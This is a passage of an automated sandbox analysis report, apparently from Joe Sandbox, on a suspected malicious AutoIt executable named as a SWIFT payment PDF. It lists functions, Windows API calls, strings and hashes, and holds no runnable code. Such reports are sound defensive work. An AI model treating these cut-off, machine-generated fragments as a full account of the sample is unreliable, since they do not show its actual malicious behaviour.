                                                                                    • Instruction Fuzzy Hash: C8C1B33260949309DF2D463AC47443EFBA55EA2BB1B1A177DD8B3CB5D5EF20C524EA20
                                                                                    Function 010284F8 Relevance: .1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                    • Instruction ID: 2a81802f0fe5abe43183360a93c62e956dfbbb1dfe7ec812d665c1d76622b8af
                                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                    • Instruction Fuzzy Hash: 0641D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D734AB41DB80
                                                                                    Function 01028388 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                    • Instruction ID: aca4c26a604d7f86c65a6b26b13048db8d7dcad0e4c644b61a953df7c7107c63
                                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                    • Instruction Fuzzy Hash: 25018078A00109EFCB44DF98C5909AEF7F5FB48210F20C69AE849A7301D730AE41DB80
                                                                                    Function 010283E8 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                    • Instruction ID: bfc39789964ec9bf190928aa1d7d2df06d059f808c747b83a474dae340c444bd
                                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                    • Instruction Fuzzy Hash: AD019278A00119EFCB84DF98C5909AEF7F5FB48310F20869AEC49A7705D730AE51DB80
                                                                                    Function 01026D58 Relevance: .0, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                    Function 0097A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 0097A2FE
                                                                                    • DeleteObject.GDI32(00000000), ref: 0097A310
                                                                                    • DestroyWindow.USER32 ref: 0097A31E
                                                                                    • GetDesktopWindow.USER32 ref: 0097A338
                                                                                    • GetWindowRect.USER32(00000000), ref: 0097A33F
                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0097A480
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0097A490
                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A4D8
                                                                                    • GetClientRect.USER32(00000000,?), ref: 0097A4E4
                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0097A51E
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A540
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A553
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A55E
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0097A567
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A576
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0097A57F
                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A586
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0097A591
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A5A3
                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,009AD9BC,00000000), ref: 0097A5B9
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0097A5C9
                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0097A5EF
                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0097A60E
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A630
                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A81D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                    • API String ID: 2211948467-2373415609
                                                                                    • Opcode ID: da6ec03610a488e9fb54e98c2dd4436b5f2b06e17f2290caf26f108bc257bb81
                                                                                    • Instruction ID: 7e67919860505e02e4bef31406278ba433f746f304ddff3431adf2821a1b4841
                                                                                    • Opcode Fuzzy Hash: da6ec03610a488e9fb54e98c2dd4436b5f2b06e17f2290caf26f108bc257bb81
                                                                                    • Instruction Fuzzy Hash: A3027071A10114EFDB14DFA4DD89EAE7BB9FF89310F008158F91AAB2A0C7709D41DBA1
                                                                                    Function 0098D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0098D2DB
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0098D30C
                                                                                    • GetSysColor.USER32(0000000F), ref: 0098D318
                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0098D332
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0098D341
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0098D36C
                                                                                    • GetSysColor.USER32(00000010), ref: 0098D374
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0098D37B
                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0098D38A
                                                                                    • DeleteObject.GDI32(00000000), ref: 0098D391
                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0098D3DC
                                                                                    • FillRect.USER32(?,?,00000000), ref: 0098D40E
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0098D439
                                                                                      • Part of subcall function 0098D575: GetSysColor.USER32(00000012), ref: 0098D5AE
                                                                                      • Part of subcall function 0098D575: SetTextColor.GDI32(?,?), ref: 0098D5B2
                                                                                      • Part of subcall function 0098D575: GetSysColorBrush.USER32(0000000F), ref: 0098D5C8
                                                                                      • Part of subcall function 0098D575: GetSysColor.USER32(0000000F), ref: 0098D5D3
                                                                                      • Part of subcall function 0098D575: GetSysColor.USER32(00000011), ref: 0098D5F0
                                                                                      • Part of subcall function 0098D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0098D5FE
                                                                                      • Part of subcall function 0098D575: SelectObject.GDI32(?,00000000), ref: 0098D60F
                                                                                      • Part of subcall function 0098D575: SetBkColor.GDI32(?,00000000), ref: 0098D618
                                                                                      • Part of subcall function 0098D575: SelectObject.GDI32(?,?), ref: 0098D625
                                                                                      • Part of subcall function 0098D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0098D644
                                                                                      • Part of subcall function 0098D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0098D65B
                                                                                      • Part of subcall function 0098D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0098D670
                                                                                      • Part of subcall function 0098D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0098D698
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 3521893082-0
                                                                                    • Opcode ID: 5546cdb3258621ac019fddba35759d14255af616e7eb508dd83f52481fa4fbfa
                                                                                    • Instruction ID: f3c2b76e564daca6364d3ff0852581c460e42d46b7d3bc52839bf39af9ae4257
                                                                                    • Opcode Fuzzy Hash: 5546cdb3258621ac019fddba35759d14255af616e7eb508dd83f52481fa4fbfa
                                                                                    • Instruction Fuzzy Hash: 8991B27240E301BFCB10AF64DC08E6BBBA9FF86325F101A19F962965E0C731D944DB92
                                                                                    Function 0096DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0096DBD6
                                                                                    • GetDriveTypeW.KERNEL32(?,009BDC54,?,\\.\,009BDC00), ref: 0096DCC3
                                                                                    • SetErrorMode.KERNEL32(00000000,009BDC54,?,\\.\,009BDC00), ref: 0096DE29
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveType
                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                    • API String ID: 2907320926-4222207086
                                                                                    • Opcode ID: 174327cab6cbbf8f8a3c7822c7dd14c8032f1d488558783fb80e647d125ebb9c
                                                                                    • Instruction ID: 11115bc53d1031e27bbc9a2735aceec93847936084f86ef852fb9a278f553e1c
                                                                                    • Opcode Fuzzy Hash: 174327cab6cbbf8f8a3c7822c7dd14c8032f1d488558783fb80e647d125ebb9c
                                                                                    • Instruction Fuzzy Hash: 3C51A430B89302ABC310EF20D8A1D39B7A0FBD4749B10C81BF467976D5DB79D945D682
                                                                                    Function 0092CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                    • API String ID: 1038674560-86951937
                                                                                    • Opcode ID: f652cad909cd866adf27933d2e71990918a04fdd01e194b4978c2d51c3f86b13
                                                                                    • Instruction ID: 9f9f443828986bc14a480ad1b50f8c5c3f6c50c33f561468a995a03f5ec52aa0
                                                                                    • Opcode Fuzzy Hash: f652cad909cd866adf27933d2e71990918a04fdd01e194b4978c2d51c3f86b13
                                                                                    • Instruction Fuzzy Hash: AE812BB0640225BBCF24AB64ED83FBF377CAFE4300F044425F945AA1CAEB61D945C695
                                                                                    Function 0098C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0098C788
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0098C83E
                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 0098C859
                                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0098CB15
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: 0
                                                                                    • API String ID: 2326795674-4108050209
                                                                                    • Opcode ID: 6fcb740e73645e2dfb9e790b711a01a23cf179a3f488664fae242a251c22cbdf
                                                                                    • Instruction ID: 80514655c1004f4eba329bee102e6ccb3dc1f27353f156fa82255937d87398f6
                                                                                    • Opcode Fuzzy Hash: 6fcb740e73645e2dfb9e790b711a01a23cf179a3f488664fae242a251c22cbdf
                                                                                    • Instruction Fuzzy Hash: 4CF1F4B1519341AFD725AF24CC89BAABBE8FF49314F08092DF589D63A1C774C844DBA1
                                                                                    Function 0098638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,009BDC00), ref: 00986449
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                    • API String ID: 3964851224-45149045
                                                                                    • Opcode ID: 03cd79da60121e01f0eb91e8dda7ab9ddab170ca65995c810deddf69922d2d39
                                                                                    • Instruction ID: 119e77cc71dff5b1281d0379edc1667ff8f490d1cf0c7783fe98720d5c06774f
                                                                                    • Opcode Fuzzy Hash: 03cd79da60121e01f0eb91e8dda7ab9ddab170ca65995c810deddf69922d2d39
                                                                                    • Instruction Fuzzy Hash: C7C149302043458BCA14FF14C551B6E77E6AFD5344F148869F896AB3E2EB34ED4ACB82
                                                                                    Function 0098D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000012), ref: 0098D5AE
                                                                                    • SetTextColor.GDI32(?,?), ref: 0098D5B2
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0098D5C8
                                                                                    • GetSysColor.USER32(0000000F), ref: 0098D5D3
                                                                                    • CreateSolidBrush.GDI32(?), ref: 0098D5D8
                                                                                    • GetSysColor.USER32(00000011), ref: 0098D5F0
                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0098D5FE
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0098D60F
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0098D618
                                                                                    • SelectObject.GDI32(?,?), ref: 0098D625
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0098D644
                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0098D65B
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0098D670
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0098D698
                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0098D6BF
                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0098D6DD
                                                                                    • DrawFocusRect.USER32(?,?), ref: 0098D6E8
                                                                                    • GetSysColor.USER32(00000011), ref: 0098D6F6
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0098D6FE
                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0098D712
                                                                                    • SelectObject.GDI32(?,0098D2A5), ref: 0098D729
                                                                                    • DeleteObject.GDI32(?), ref: 0098D734
                                                                                    • SelectObject.GDI32(?,?), ref: 0098D73A
                                                                                    • DeleteObject.GDI32(?), ref: 0098D73F
                                                                                    • SetTextColor.GDI32(?,?), ref: 0098D745
                                                                                    • SetBkColor.GDI32(?,?), ref: 0098D74F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 1996641542-0
                                                                                    • Opcode ID: 0fed6ad47beb4379c6c2e240184163fe5a7cc41b148eab11ced3cf18d57a5667
                                                                                    • Instruction ID: 4a24ca0276820eac8f24dda9e9c42db372367e3766f742bc39c3a627f2bd8291
                                                                                    • Opcode Fuzzy Hash: 0fed6ad47beb4379c6c2e240184163fe5a7cc41b148eab11ced3cf18d57a5667
                                                                                    • Instruction Fuzzy Hash: 8A515B72916208BFDF10AFA8DC48EAE7B79EF09320F114515F916AB2E0D7759A40DF90
                                                                                    Function 0098B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0098B7B0
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0098B7C1
                                                                                    • CharNextW.USER32(0000014E), ref: 0098B7F0
                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0098B831
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0098B847
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0098B858
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0098B875
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0098B8C7
                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0098B8DD
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0098B90E
                                                                                    • _memset.LIBCMT ref: 0098B933
                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0098B97C
                                                                                    • _memset.LIBCMT ref: 0098B9DB
                                                                                    • SendMessageW.USER32 ref: 0098BA05
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0098BA5D
                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0098BB0A
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0098BB2C
                                                                                    • GetMenuItemInfoW.USER32(?), ref: 0098BB76
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0098BBA3
                                                                                    • DrawMenuBar.USER32(?), ref: 0098BBB2
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0098BBDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                    • String ID: 0
                                                                                    • API String ID: 1073566785-4108050209
                                                                                    • Opcode ID: 19366d7d78e54c54f98714091292b2ebf570d2e58a74598df1abf58c547937ff
                                                                                    • Instruction ID: c2a202aa9aad99b05dbea113a03f09addf9b01791f03975cb9e0f3f8f93fa60a
                                                                                    • Opcode Fuzzy Hash: 19366d7d78e54c54f98714091292b2ebf570d2e58a74598df1abf58c547937ff
                                                                                    • Instruction Fuzzy Hash: 7AE18D71900219ABDF20AF65CC84EEE7BBCFF45724F188156FA19AA390D7748A41DF60
                                                                                    Function 0098764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 0098778A
                                                                                    • GetDesktopWindow.USER32 ref: 0098779F
                                                                                    • GetWindowRect.USER32(00000000), ref: 009877A6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00987808
                                                                                    • DestroyWindow.USER32(?), ref: 00987834
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0098785D
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0098787B
                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009878A1
                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 009878B6
                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009878C9
                                                                                    • IsWindowVisible.USER32(?), ref: 009878E9
                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00987904
                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00987918
                                                                                    • GetWindowRect.USER32(?,?), ref: 00987930
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00987956
                                                                                    • GetMonitorInfoW.USER32 ref: 00987970
                                                                                    • CopyRect.USER32(?,?), ref: 00987987
                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 009879F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
